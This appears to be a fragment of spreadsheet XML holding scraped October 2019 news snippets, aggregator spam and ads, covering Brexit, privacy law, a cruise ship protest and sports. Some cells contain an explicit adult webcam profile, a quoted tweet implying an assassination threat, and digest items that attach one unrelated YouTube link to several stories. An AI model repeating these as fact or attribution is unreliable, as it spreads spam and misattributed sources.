    <t>Vile. Paging the Secret Service… Don't get too cocky traitor. They showed up for JFK too. — Tom Arnold (@TomArnold) October 18, 2019</t>
  </si>
  <si>
    <t>Flower Mound, Texas News Nevada man ‘kidnapped, beat, burned, choked his girlfriend – forcing her to eat lye – for 16 DAYS’ Goodyear Blimp is now a $150 a night Airbnb which comes with a ‘football lounge’ Inspirational former Florida news anchor dies aged 57 after losing her battle with cancer Australian scientists discover ‘cure’ for cervical cancer using gene-editing technology ESPN cuts off Stephen A. Smith as he brings up the Israeli-Palestinian conflict Vandals defile memorial to Holocaust victims on the eve of Yom Kippur Busan: A.R. Rahman ‘Le Musk’ Directing Debut in Post-Production Nevada man ‘kidnapped, beat, burned, choked his girlfriend – forcing her to eat lye – for 16 DAYS’ Posted: 08 Oct 2019 11:38 PM PDT Authorities say Benjamin Obadiah Foster, 33, forced his girlfriend to eat lye while holding her captive in her own Las Vegas apartment for 16 days before she escaped on October 2 via https://youtu.be/mFQfuwZZ8h8 Goodyear Blimp is now a $150 a night Airbnb which comes with a ‘football lounge’ Posted: 08 Oct 2019 11:38 PM PDT Goodyear Blimp is partnering with Airbnb to allow a few lucky college football fans to stay overnight in the legendary blimp for $150 to celebrate college footballs 150th anniversary via https://youtu.be/mFQfuwZZ8h8 Inspirational former Florida news anchor dies aged 57 after losing her battle with cancer Posted: 08 Oct 2019 11:08 PM PDT Inspirational former news anchor, Wendy Chioji, who climbed Mount Kilimanjaro and completed triathlons while beating cancer twice died at age 57 on Monday after her 18-year-long battle with the disease via https://youtu.be/mFQfuwZZ8h8 Australian scientists discover ‘cure’ for cervical cancer using gene-editing technology Posted: 08 Oct 2019 11:08 PM PDT Scientists (pictured) used gene-editing technology to target cervical cancer tumours in mice using ‘stealth’ nanoparticles, and revealed the mice treated had a 100 per cent survival rate. via https://youtu.be/mFQfuwZZ8h8 ESPN cuts off Stephen A. Smith as he brings up the Israeli-Palestinian conflict Posted: 08 Oct 2019 11:08 PM PDT Stephen A. Smith brought up the Israeli-Palestinian conflict in response the Hong Kong-China controversy on ESPN’s First Take on Tuesday and the show immediately wen to commercial break. via https://youtu.be/mFQfuwZZ8h8 Vandals defile memorial to Holocaust victims on the eve of Yom Kippur Posted: 08 Oct 2019 11:08 PM PDT Vandals left anti-Semitic hate symbols on the the holocaust Garden of Remembrance in Westchester County, New York, on eve of the most significant holiday in the Jewish faith. via https://youtu.be/mFQfuwZZ8h8 Busan: A.R. Rahman ‘Le Musk’ Directing Debut in Post-Production Posted: 08 Oct 2019 10:41 PM PDT Oscar-winning Indian composer A.R. Rahman ("Slumdog Millionaire") is now in post-production with his directorial debut "Le Musk." The film is a multi-sensory Virtual Reality experience, with haptic touch experiences and a sense of smell. Rahman developed the story from an original idea by his wife Sairaa and directed from a screenplay by Gurachi Phoenix, besides […] via https://youtu.be/mFQfuwZZ8h8 You are subscribed to email updates from News Digest. To stop receiving these emails, you may unsubscribe now. Email delivery powered by Google Google, 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States</t>
  </si>
  <si>
    <t>12 October 2019 – BBC News Scientists are now saying that how fast people walk in their 40s is a good indicator of how much their brains, as well as their bodies, are ageing. Researchers measured the ageing process by using an easy test of gait speed. The international team called the findings an “amazing surprise“. It has also been linked to mental health decline. Source</t>
  </si>
  <si>
    <t>Ahead of Brexit, British retailers suffer worst September since the mid-1990s UK retailers endured their worst September since at least the mid-1990s, according to the British Retail Consortium (BRC). The BRC said that surveys showed people were spending money on entertainment instead of shopping in the run-up to Brexit, Reuters reported. In a potential warning sign for consumer spending, which has helped the economy ahead of Brexit, the association said total retail sales values declined 1.3% in September year-on-year. Average growth over the last 12 months slowed to 0.2%, the weakest rate since the BRC began its records in 1995. While official data retail data have shown healthier consumer demand, surveys like the BRC’s have suggested household spending may be starting to wane, adding to worries about a possible recession even before Britain is due to leave the European Union later this month. Several British retailers, including supermarkets Asda and Morrisons and home improvement group Kingfisher, have said uncertainty around Brexit was affecting their customers. Earlier this month, the BRC said that fresh food inflation rate halved in September to 0.7% compared to 1.4% in August. It is the lowest inflation rate since March 2018. “Food price inflation eased to a 17-month low reflecting both lower domestic prices for vegetables and lower global prices for meat,” said Helen Dickinson, Chief Executive of the BRC. Original Source Follow us on Twitter Amazon’s 30-Day FREE Trials The post Ahead of Brexit, British retailers suffer worst September since the mid-1990s appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Michael Ambrose Endicott, 75, was convicted of three counts of indecently dealing with a child in the 1970s and 1980s after a five-day trial in Brisbane District Court in March this year.</t>
  </si>
  <si>
    <t>WASHINGTON — A rare thing emerged in Washington early this year: agreement. Republicans and Democrats in Congress, as well as the Trump White House, all said they wanted a new federal law to protect people’s online privacy. Numerous tech companies urged them on. And they had a deadline. With a broad California privacy law set to go into effect early next year, many federal lawmakers and the tech companies wanted to get ahead of it and avoid having state-by-state rules. But after months of talks, a national privacy law is nowhere in sight. The window to pass a law this year is now quickly closing. Lawmakers continue to disagree on parts of the bill, including how best to enforce a new law and how much freedom states should have to pass their own rules. And some California lawmakers have balked at efforts to override their state’s new law. Several lawmakers and their aides insist that they are making headway, meeting regularly to sort out the remaining roadblocks. “We’re talking a lot, we’re meeting a lot, member-to-member, staff-to-staff, and we’re making good progress,” said Senator Roger Wicker, the Republican from Mississippi who chairs the Senate Commerce Committee, which includes several lawmakers shepherding the effort. Yet they have nothing public to show for it. And they are now also contending with a Capitol gripped by the House’s impeachment inquiry into President Trump. The struggle to regulate consumer data shows how lawmakers have largely been unable to turn rage at Silicon Valley’s practices into concrete action. Revelations that the political consulting firm Cambridge Analytica had obtained reams of Facebook user data set off the Washington reckoning over online privacy last year. The social network has since agreed to pay a record $5 billion fine with regulators for mishandling user information, while Congress has grilled major tech executives over their data practices. But the fervor to crack down on Silicon Valley has produced only a single new law, a bill to prevent sex trafficking online. “With a Congress that tends to be a do-nothing Congress, they tend to not do a whole heck of a lot unless the phones are ringing off the hook,” said Gigi Sohn, a former Federal Communications Commission official. “That may be the missing piece.” The United States has some laws that protect consumers’ privacy, like medical information collected by a doctor. But Congress has never set an overarching national standard for how most companies gather and use data. Regulators in Europe, in contrast, put strict new privacy rules into effect last year. Many tech companies built lucrative businesses off their users’ personal information, often by offering a “free” product in return. Facebook, Google and Twitter, for example, let advertisers precisely target messages based on people’s habits. Other industries — from health care to retail to banking — have also looked at ways to take advantage of customer data. Last year, California lawmakers passed privacy legislation in the face of public backlash against those companies. Called the California Consumer Privacy Act, the state law gives people the right to see what personal information companies have compiled on them and the right to delete that data and stop companies from selling it. The law takes effect on New Year’s Day 2020; enforcement of it begins in July. Lobbyists representing the tech giants have spent much of this year trying to modify California’s strict rules before they are enforced. The Internet Association, a group whose members include Google, Facebook and Amazon, supported a bill exempting advertising services from being covered by some of the law’s restrictions, along with several others tweaking the legislation. At the same time, industry groups flooded Washington with a clear message meant to neutralize California’s rules entirely. Congress should pass a national privacy law, they said, and include a provision superseding any state legislation on the issue. Joseph Simons, the chairman of the Federal Trade Commission, the top privacy regulator in the country, has also weighed in, urging Congress to pass a national law. That pressure is likely to increase given that the tech industry’s lobbying efforts in California have had mixed success. The advertising exemption did not make it into the state law, for example. Last month, privacy advocates introduced a new ballot campaign to give the law more teeth. A group of chief executives who are part of the group Business Roundtable also sent congressional leaders a letter last month calling for them to pass a national privacy law “as soon as possible.” The Internet Association released a digital and radio advertising campaign warning that American consumers could have to contend with 50 individual state privacy laws. And Business Roundtable has run ads on Facebook linked to its privacy positions. In one, a video shows a map of the United States that breaks into five pieces, according to Facebook’s library of political and issue advertisements. “Our nation’s privacy laws are FRAGMENTED,” it said. Tech industry representatives argue that a national law is the best substantive solution in an era of growing privacy concerns. But they also said that their losses in California factor into their strategy. “California certainly makes things more complicated for people, but this is not just a reaction to California,” said Michael Beckerman, the chief executive of the Internet Association. Senator Brian Schatz, Democrat of Hawaii, who has been involved in the privacy talks, said Congress remains in negotiations over a national privacy law. He said there were “some remaining thorny issues” but estimated that lawmakers had “probably done 70 percent of the work.” Senator Jerry Moran, Republican from Kansas, and Richard Blumenthal, Democrat from Connecticut, are nearing a complete version of a privacy bill, according to one person briefed on the talks. In the House, Democrats have been negotiating with their Republican counterparts but are also considering producing a unilateral measure should bipartisan discussions fail, said a different person familiar with the deliberations. They both spoke on the condition of anonymity because information on the talks was shared confidentially. “We’re not amending a statute, we’re creating one,” said Mr. Schatz. “This is an area where there is no privacy framework in the federal law so we had to construct it from whole cloth — and that takes time to do right.” One particularly divisive question is whether consumers themselves should be able to directly sue companies that violate the new federal law. Privacy advocates said that a so-called private right of action would give consumers recourse if regulatory agencies failed to take action in response to a troublesome practice. But Republicans remain skeptical. “It would really create problems,” Mr. Wicker said. Lawmakers have also publicly disagreed over whether they should give the F.T.C. more authority to make rules on privacy than it currently has — and how far they must go to pre-empt the state laws. As they haggle over the details of any possible legislation, lawmakers have fended off most of the questions about their plans from reporters who stalk them through Capitol Hill hallways and stake out their negotiations. Asked last week about the status of the talks, Mr. Wicker, who once mused that a privacy proposal would be public by early September, deadpanned. “We’ll have an announcement this afternoon,” he said. Source link</t>
  </si>
  <si>
    <t>The alcohol lobby is resisting a push to explicitly warn consumers that drinking is harmful to unborn babies, as the regulator pushes ahead with plans to make pregnancy warning labels mandatory.</t>
  </si>
  <si>
    <t>Hello, STAMPlorations friends. We are super excited to welcome you to our new season of challenges after an extended summer break. As you can see, our challenges have changed a bit for this season to keep it interesting. You will see there are some changes this season. All three new and improved STAMPlorations challenges (Theme &amp; Photo Prompt, CAS and Stencil) will launch on the 1st of the month and you have all month to play along. There will be some additional inspiration for all three challenges mid-month. And of course, our Never-ending Anything Goes Challenge will continue as normal! As you can see from the graphic below, we are challenging you with a theme and photo prompt. That means you can link up any kind of project as long as it's inspired by the theme, the photo, or both! We ask you to include stamping of some kind in your project (rubber, clear or digi stamps are all permitted). We love to see you use your STAMPlorations supplies if you have any, but any crafting supplies are allowed. Don't forget to link to this post (find the link below) and make sure you add the challenge graphic to your post to qualify for prizes. We will reveal the winners on the 10th of the following month, so don't forget to check back then to see if you are one of the winners! If you play, make sure you include the graphic in your post and link back to this challenge post in order to qualify for our prizes :o) Please also read our simple rules, which you'll find toward the end of this post. Link back: https://stamplorations.blogspot.com/2019/10/october-challenge.html The design team have created some amazing works of art to inspire you to play along! CHRIS {Trendy Spring Blooms, Faerie Door and Balloons and Banners} CRAFTYFIELD {Retro Circles, For the Birds, Shine Bright Clear Stickers and Crazy Double Running Stitch Rectangle Nesting Dies} ELAINE {Bloomdala Bliss, Smile and Bloomdala Bliss: Felicity} JANE {Party Time, Trendy Leaves 2 and Cupcake Builder 2} JULIE {Thankful and Blessed, For the Birds, Just Because and Crazy Double Running Stitch Rectangle Nesting Dies} MONICA {Doodled Autumn Pumpkin Cover Plate Die and Thankful Every Day Phrase Die} MONIKA {Sparkly and Make A Wish Phrase Die} SUCHI {Best Mom Ever and New Day Clear Stickers} ***** Inspired by the theme or photo? Please just keep in mind these simple rules: Link up any type of project(s) based on the theme, the photo, or both. You must use stamps in your project(s) -- rubber, clear, or digi from any company. Non-STAMPlorations stamps are OK. Link up to 6 entries and link up to as many other challenges as you want. You must display the challenge graphic in your post (if linking from your blog) and link back to the challenge post (not just the main blog) in order to be eligible to win (and receive the corresponding prize). Link up by October 31, 11:55 p.m. Pacific time. Prizes: The winner will receive a $15 gift certificate. The runner up will receive a $10 gift certificate Three (3) randomly drawn crafters will each receive a $5 gift certificate. Link back: https://stamplorations.blogspot.com/2019/10/october-challenge.html October 2019 Theme &amp; Photo Prompt Challenge Heads up! If you used at least one STAMPlorations product (digi or clear stamp, stencil, die, clear stickers, sequins, or a page from any of our coloring books), make sure to link it up to our Never-ending Anything Goes Challenge too for a chance to win more STAMPlorations products! We draw two winners every month. You may also want to check out our other challenges. You can find links to all our challenges at the top of the page for more inspiration and more opportunities to win prizes. You are invited to the Inlinkz link party!Click here to enterAll players, please read: Before you add your project to the link-up, make sure that you are already linking up to this challenge on your blog post. Otherwise, your entry may be deleted. Also, please link up a maximum of 6 entries -- whether you are linking from your blog or your Instagram account. The maximum entry is 6 per player, so linking up 4 of your projects from your blog and 3 projects from your Instagram account will disqualify you from the voting and prizes. ***** PS: Check out the store's CURRENT PROMOTIONS page for some awesome deals: October fall sale, new CUTplorations dies pre-order sale, coffee-themed sale, freebies with orders, and more!</t>
  </si>
  <si>
    <t>Phil Simmons has been reappointed as West Indies head cricket coach, three years after he was controversially sacked from the position.</t>
  </si>
  <si>
    <t>PLAY ENGLISH ROMANIAN FLASHCARDS FREE Select English or Romanian, then select your answer to the prompt word from the four options. Have fun 😉 Republished by Blog Post Promoter</t>
  </si>
  <si>
    <t>These comments from Chelsea fans before the Newcastle match are pretty bizarre. Despite a team scoring goals for fun and potentially going as high as second with a win today,...These comments from Chelsea fans before the Newcastle match are pretty bizarre. Despite a team scoring goals for fun and potentially going as high as second with a win today,... You can click here to read the full article. The post Chelsea fans comments show big fear factor ahead of facing Newcastle United – Bizarre appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>Hi there, I’m looking for a cleaner to turn over an airbnb on a regular basis. It is a very simple 1 bedroom apartment located uptown and takes less than an hour to do. All cleaning supplies are stocked. You just need to bring yourself. I pay a rate of $25/turn. If you are available .. Read more</t>
  </si>
  <si>
    <t>Amber Rose Gives Birth to Baby No. 2 Shutterstock Muva herself is officially embarking on her next muva-hood adventure! Amber Rose has given birth to her and boyfriend Alexander “AE” Edwards‘ first child together, a son named Slash Alexander Edwards. On Instagram, her boyfriend announced, “Thank u @amberrose for loving me so much that u put ur body thru it 2 bring my in2 the world. I could never be as strong as u. Slash a rockstar.” The social media star is already a proud mama to 6-year-old Sebastian Taylor Thomaz, who she co-parents with rapper Wiz Khalifa. Rose announced her second pregnancy in early April by sharing a photo of her growing baby bump. “[Alexander] and I are SUPER excited to announce that we have a sweet little baby boy on the way!” she shared at the time. “P.S Sebastian is soooooo happy to be a big brother!” In the months that followed, the 35-year-old took fans along the way of her pregnancy journey by sharing plenty of photos with her boo, who is an exec at Def Jam Records, and son. The proud parents first met in 2015, but didn’t start dating until three years later. Earlier this year, Amber called Alexander her “best friend” in a heartfelt Instagram post. “We talk for hours, he makes me a better person, he listens to me and understands me,” the SlutWalk organizer gushed. “He also came into my life at a time where I’ve had enough of the narcissistic, cheating and abuse I’ve endured over the years from my previous relationships.” Amber continued, “I felt so damaged when I met him and pushed him away in the beginning, he has talked me through everything while simultaneously loving me and working with me so I could overcome my fear of loving someone in the most healthiest way again.” Prior to finding love and starting a family with Alexander, Rose and Wiz Khalifa were married for just over a year in 2013. She also dated hip-hop star Machine Gun Kelly in 2015, followed by Dancing With the Stars‘ pro Val Chmerkovskiy and rapper 21 Savage in 2017. Congratulations to Amber and Alexander! var fbstarttime = new Date(); !function(f,b,e,v,n,t,s) if (f.fbq) return; n = f.fbq = function() n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments) ; if (!f._fbq) f._fbq = n; n.push = n; n.loaded =! 0; n.version = ‘2.0’; n.queue = []; t = b.createElement(e); t.async =! 0; t.src = v; s = b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t, s); (window, document, ‘script’, ‘https://connect.facebook.net/en_US/fbevents.js’); fbq(‘init’, ‘1611373942516879’); fbq(‘track’, ‘PageView’); var fbendtime = new Date(); Original Source Follow us on Twitter Amazon’s 30-Day FREE Trials The post Amber Rose Gives Birth to Baby No. 2 appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>My Kinks: My favourite are cbt, sph, cei, sissification, hum Webcam profile: Classic beauty of temptation, elegant sexuality, blue/green eyes, i will overpower you into falling in love before you even realize it. I may present a cold, detached and unemotional air to the world, but underneath is a tremendous power, extreme strength, intense passion and a strong will. Favourite sex position: CEO What I do in my amateur show: When you know how to talk and act in front of a true Domme. What I don’t like: Individuals who pretend to be good slaves. Freeloaders, disobedient &amp; rude bitches. Gallery</t>
  </si>
  <si>
    <t>The latest planning applications from Sedgemoor District Council Read more? Click here</t>
  </si>
  <si>
    <t>Entertainment industry icons John ‘Strop’ Cornell and his wife, Delvene Delaney, are selling their final block on their former vast Byron Bay beach compound.</t>
  </si>
  <si>
    <t>Alan Shearer has been raving over the work rate of Newcastle United forward Joelinton but says he is under a lot of pressure to perform at St James’ Park. The Magpies’ legend admitted that the decisions made in the summer to sell the club’s two top-scorers from last season, Ayoze Perez and Salomon Rondon, meant that the Brazilian had to hit the ground running. Source</t>
  </si>
  <si>
    <t>Frank Lampard has confirmed an injury boost ahead of Chelsea's clash with Newcastle but three others have been ruled out of the game.</t>
  </si>
  <si>
    <t>BBC Spotlight is told MI5 wiped secret information relating to the murder of solicitor Pat Finucane. The post Pat Finucane: Security service ‘wiped’ hard drives appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>They say the Leaders' Debates Commission failed to give adequate reasons for its decision.</t>
  </si>
  <si>
    <t>Despite assurances on supply, National Grid warns of steep price hikes in UK electricityBritain will be able to keep its lights on and homes warm through the winter even if imports of European electricity and gas come to a halt, according to National Grid.The energy system operator said the UK’s first winter outside of the European Union would pose no extra challenges to securing the UK’s gas and power supply. Continue reading… Read More</t>
  </si>
  <si>
    <t>League newcomers Southside Flyers know they will face disruptions ahead of their season opener, but coach Cheryl Chambers backs side to come together quickly.</t>
  </si>
  <si>
    <t>SKY has three big offers available right now and here’s how much each will save you and what is included. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>Richmond received pick 39 as compensation for losing Brandon Ellis while the Brisbane Lions nabbed Adelaide's Cameron Ellis-Yolmen.</t>
  </si>
  <si>
    <t>When I was a Marine, I used to work as a special operator in Afghanistan, fighting alongside a group of Tajik tribesmen who had also proved themselves loyal friends. One of those deployments coincided with a federal government shutdown in Washington, which put limits on the funding of our unit. When I had to explain to my Afghan counterpart that even though he and his men wouldn’t be paid on time, we still needed them to go out on a mission, he asked, “Are you being paid?” When I said yes, he answered, “It doesn’t seem fair that you should be paid on this mission and that we should not.” Instead of arguing, we delayed the mission. It was a gesture of fairness that was long remembered. Wars have a long memory. Treating our allies unfairly has never served our interests well over time. Thirty years ago it seemed difficult to imagine a reason for the United States to remain engaged with a Central Asian people with a reputation as fierce fighters who had helped us defeat a common enemy. And so we abandoned the Afghans to their own civil war, creating conditions that led to the rise of the Taliban and the Sept. 11 attacks. In the short term Mr. Trump might claim that he has disentangled America from yet another foreign intervention. However, the Turks, the Russians, the Iranians and the Syrian regime of Bashar al-Assad aren’t playing for the short term. As Abed and I finished our dinner, the conversation turned to the future. He told me about the office space he was planning to lease in Istanbul and about several common friends of ours who, like him, were turning in their Syrian citizenship to become Turks. With our stomachs full we walked toward the Bosphorus to catch separate trains home. “Does it seem strange,” I asked, “to think your child will be Turkish?” He laughed, placing his hand on my shoulder. “Not really,” he said. “Pretty soon none of us will be Turkish. We’ll all be Ottoman.” Elliot Ackerman is the author, most recently, of the memoir “Places and Names: On War, Revolution, and Returning.”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Source link</t>
  </si>
  <si>
    <t>A triple zero operator heard an argument, screaming and then silence during a call from a pregnant woman killed when flung from a ute allegedly driven by her partner.</t>
  </si>
  <si>
    <t>Waiver wire advice heading into Week 5 of the fantasy football season. Players to target and players to avoid. Source: Sports Business News</t>
  </si>
  <si>
    <t>MEGHAN MARKLE, 38, wore shockingly cheap earrings while on tour of South Africa from American denim brand Madewell. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>Typhoon Hagibis passed by Japan’s Chichijima Island on October 10 and 11, bringing rain and winds to the small outlying island. This footage shows debris in the roads and waves churned up by the storm. The Japanese Meteorological Agency (JMA) issued special heavy rain warnings in the five prefectures of Ibaraki, Tochigi, Niigata, Fukushima and Miyagi. Warnings had earlier been issued for Tokyo and the central and eastern prefectures of Shizuoka, Kanagawa, Saitama, Gunma, Yamanashi and Nagano. The JMA also said there was a risk of landslides, and encouraged people to evacuate to higher ground. Chichijima Island is part of Tokyo prefecture. Typhoon Hagibis was expected to bring heavy rainfall and possible mudslides mirroring 1958’s Typhoon Ida, which left 888 people dead and 381 missing, NHK and The Japan Times reported. Credit: keroza emon via Storyful</t>
  </si>
  <si>
    <t>It is not clear if the rebellion was sparked by the clogged toilets or the canceled visit to Scotland, but passengers on the Norwegian Cruise Line ship had had enough. In recent days, travelers on the “mystical fjords” voyage in Europe have staged (and live tweeted) a veritable mutiny after inclement weather forced repeated changes to their itinerary and trapped them at sea. The ship, called Norwegian Spirit, departed from Southampton, England, recently for a 14-day voyage with planned stops in the Netherlands, Norway and Iceland. But those plans were scuttled by bad weather, forcing the ship to plan new stops — some of which were then also canceled because of the weather. Passengers said they were stuck at sea for three days. By Monday, a fed-up — and social media-savvy — group of passengers rallied in the ship’s atrium to vent their outrage at the crew, demand a refund from the company and post images and video of their revolt on newly created Twitter and YouTube accounts. They described the scene as a “riot” and “open rebellion.” “Buddy, you’re not a manager, we want the head — who is driving the boat?” a passenger in one video asked a uniformed crew member, who stood flanked by security personnel in a crowd of angry vacationers. Nearby, a woman screamed. “What you’re doing right now is you’re not helping the situation, you’re getting people amped up,” the passenger said to the crew member. Later, looking into the camera, the passenger said: “Nothing on this itinerary is the same. Nothing is the same. Not one thing.” Passengers shared grim images of their trip on Twitter, including video and pictures of toilets that did not flush, a picture of a uniformed crew member in a scrum of angry passengers grabbing one of them by the wrist, and a receipt for a $79 tour of the ship that included a visit to the laundry room. “After three days floating around the Atlantic the bathrooms are backing up, not flushing, and out of order today on Norwegian Spirit,” one protester, Cody McNutt, wrote on a Twitter account he started to share updates from the protests. He said it “smelled like sewage in public areas on the ship.” Mr. McNutt wrote that the ship was scheduled to dock in Southampton on Friday but that he had gotten off at an earlier port. “Many passengers got off the ship when it stopped after 3 days stuck floating the ocean, fearing for their safety and health,” he wrote. Another video showed crew members retreating up a staircase to escape dozens of angry passengers in the ship’s atrium, many of whom could be seen holding their phones over their heads to record the mayhem. The man being booed was the captain, the passengers said. “We don’t want to be on this ship!” one man yelled, as the crew members clambered up the stairs. Another man agreed, yelling, “We want off the ship!” In another video, passengers at a reception desk can be seen angrily reacting to staff members who advised them to call the cruise line’s Miami headquarters for information. Again, many of the passengers can be seen recording the scene with their phones. “It’s a good thing we got this fancy new phone here for our trip,” a woman quipped. A representative for Norwegian Cruise Line declined on Thursday to provide a day-by-day breakdown of events on the ship or to provide its original and modified itineraries. In a statement, the company pleaded for calm. “We understand that it is disheartening when we are unable to call on ports that our guests have been looking forward to visiting,” the company said. “However, we do ask for our guests’ patience, cooperation and understanding that severe weather conditions are an act of God and cannot be controlled, influenced or remediated by the cruise line.” A spokesman said that the itinerary was changed because of “severe weather conditions” and that the company had offered its passengers 25 percent off the cost of a future cruise. But on social media, the protesters said that offer was not enough. They held up signs in the ship’s atrium and chanted: “Refund! Refund! Refund!” Source link</t>
  </si>
  <si>
    <t>Russian Chinese Dictionary – travel dictionary to translate Russian to Chinese. Click on the list to show Russian or Chinese synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Russian Chinese Dictionary →</t>
  </si>
  <si>
    <t>Heartburn medicine pulled by GlaxoSmithKline while it investigates source of impurityGlaxoSmithKline is recalling the popular heartburn medicine Zantac in all markets, days after the US Food and Drug Administration (FDA) found “unacceptable” levels of probable cancer-causing impurity in the drug. Zantac, also sold generically as ranitidine, is the latest drug in which cancer-causing impurities have been found. Regulators have been recalling some blood pressure and heart failure medicines since last year. Continue reading… Read More</t>
  </si>
  <si>
    <t>Downtown Los Angeles California Credit Repair | (888) 630-5917 Free Credit Repair Counseling call (888) 630-5917 remove bankruptcy, free consumer report, fix bad credit, check your annual Equifax, TransUnion, Experian credit report. College Savings Expectations And Family Contributions: Birth to 8th GradeThat may come from... Friday 04 October 2019 06:24 PM UTC-05 College Savings Expectations And Family Contributions: Birth to 8th Grade That may come from lifestyle choices, investing in a business, credit card debt, or student loan debt. If your debt goes up a dollar and your assets go up … http://dlvr.it/RFXMTn</t>
  </si>
  <si>
    <t>Australian design platform Canva is now valued at $4.7 billion on paper after raising an additional $125 million.</t>
  </si>
  <si>
    <t>Pope Francis is pondering the question of allowing married men to be ordained as Catholic priests, but his opponents fear it will be doctrinal Trojan horse that brings similar change to the West.</t>
  </si>
  <si>
    <t>Sydney's median house price is back over $900,000 and in Melbourne it is $729,000 as both markets surge on recent interest rate cuts.</t>
  </si>
  <si>
    <t>Jonathan Guignard</t>
  </si>
  <si>
    <t>The average home price in Regina declined in the third quarter of 2019, decreasing 5.9 per cent year-over-year to $311,356, according to Royal LePage.</t>
  </si>
  <si>
    <t>Pelicanstore</t>
  </si>
  <si>
    <t>Greetings from the official Australian Pelican store! We've debuted an evergreen bundling system for phone cases and screen protectors; whenever you add a phone case and screen protector which are compatible with the same device, a 25% discount will be automatically applied to the Interceptor screen protector in the cart. Current supported models are: iPhone 6/7/8 https://www.pelicanstore.com.au/interceptor-glass-screen-pro... iPhone 6+/7+/8+ https://www.pelicanstore.com.au/interceptor-glass-screen-pro... iPhone X/Xs/11 Pro https://www.pelicanstore.com.au/interceptor-glass-screen-pro... iPhone Xs Max/11 Pro Max https://www.pelicanstore.com.au/interceptor-glass-screen-pro... iPhone Xr/11 https://www.pelicanstore.com.au/interceptor-glass-screen-pro... Samsung Galaxy S8 https://www.pelicanstore.com.au/interceptor-glass-screen-pro... Samsung Galaxy S8+ https://www.pelicanstore.com.au/interceptor-glass-screen-pro... Samsung Galaxy S9 https://www.pelicanstore.com.au/interceptor-glass-screen-pro... Samsung Galaxy S9+ https://www.pelicanstore.com.au/interceptor-glass-screen-pro...</t>
  </si>
  <si>
    <t>More than twice as many children in England are waiting to be adopted as there are families willing to adopt. The post More families needed for children awaiting adoption appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Gerard Gilbert</t>
  </si>
  <si>
    <t>Also The Apprentice ‘boys’ and ‘girls’ create children’s toys and Idris Elba returns for another series of In The Long Run</t>
  </si>
  <si>
    <t>William Frederick Schultz has a 30-year history of sexually abusing children.</t>
  </si>
  <si>
    <t>Trains start running again, but a number of stations remain closed, with more protests expected. The post Hong Kong transport system partially reopens appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>INTERSTELLAR nomads such as the cigar-shaped anomaly known as Oumuamua may play a crucial role in “seeding” the universe with planets including our own, expert Professor Michele Bannister has said. The post Oumuamua news: Do intergalactic nomads really ‘seed the universe’? appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Cornwall is already home to one significant geothermal energy scheme.</t>
  </si>
  <si>
    <t>Spanish Bulgarian Dictionary – travel dictionary to translate Spanish to Bulgarian. Click on the list to show Spanish or Bulgarian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Spanish Bulgarian Dictionary →</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/10/7/20899445/chromebook-101-how-to-keyboard-shortcuts-search-window Chromebook 101: how to find keyboard shortcuts Photo by James Bareham / The Verge Keyboard shortcuts have always been a favorite of writers, coders, and other fast-track computer users who want to get as much text on the screen as they can without having to lift their hands from their keyboards. But in the case of Chromebooks, shortcuts can also help new users cope with some of the differences between the design of the Chromebook and other systems, such as Macs and Windows PCs. For example, instead of the usual Caps Lock key that most keyboards have, Chromebooks have a Launcher key, which is used to bring up the Launcher (the equivalent of the Mac Launchpad or the Windows Start Menu). If you prefer to reinstate the Caps Lock (as I usually do), you can use the keyboard shortcut Alt + Launcher to change the Launcher… Continue reading… Source: https://www.theverge.com/2019/10/7/20899445/chromebook-101-how-to-keyboard-shortcuts-search-window The post Chromebook 101: how to find keyboard shortcuts appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>A MILLIONAIRE Queensland businessman, whose company is at the centre of a controversy over its six-figure NRL sponsorship, has been accused of propositioning a junior staffer for a “threesome”, a court has been told.</t>
  </si>
  <si>
    <t>STAR WARS 9 The Rise of Skywalker main trailer may be with fans even sooner than hoped. The official Twitter account just posted a major clue. Daily Express :: Entertainment Feed</t>
  </si>
  <si>
    <t>An unexpected encounter with his fictional self in Australia helped actor Christopher Knight face up to his Brady past.</t>
  </si>
  <si>
    <t>The GBP/USD exchange rate is currently trading at $ 1.2645, having climbed roughly 0.3 percent from today’s opening levels following upbeat comments from the EU’s chief Brexit negotiator Michel Barnier. Sterling initially surged as M Barnier told EU ministers in Luxembourg that securing a Brexit deal this week would “be difficult” but “still possible”. Daily Express :: Finance Feed</t>
  </si>
  <si>
    <t>Larissa Romensky</t>
  </si>
  <si>
    <t>Their average age is 75, but that's not stopping this group of retirees powerlifting their way to good health.</t>
  </si>
  <si>
    <t>Prime Minister Scott Morrison has congratulated the US and China in what appears to be a breakthrough in the long running trade war between the two countries.</t>
  </si>
  <si>
    <t>Ten Victorian teachers were disqualified for misconduct in 2018-19 and a further 19 suspended over allegations including sexual offences against children.</t>
  </si>
  <si>
    <t>Maiden winner Warning claimed Saturday’s Super Impose Stakes at Flemington dominant fashion to stake his claim on a VRC Derby berth.</t>
  </si>
  <si>
    <t>Brad Crouch has turned an injury-marred 2018 into a career-season claiming a first Malcolm Blight Medal as Adelaide's best and fairest winner.</t>
  </si>
  <si>
    <t>manifesthousing</t>
  </si>
  <si>
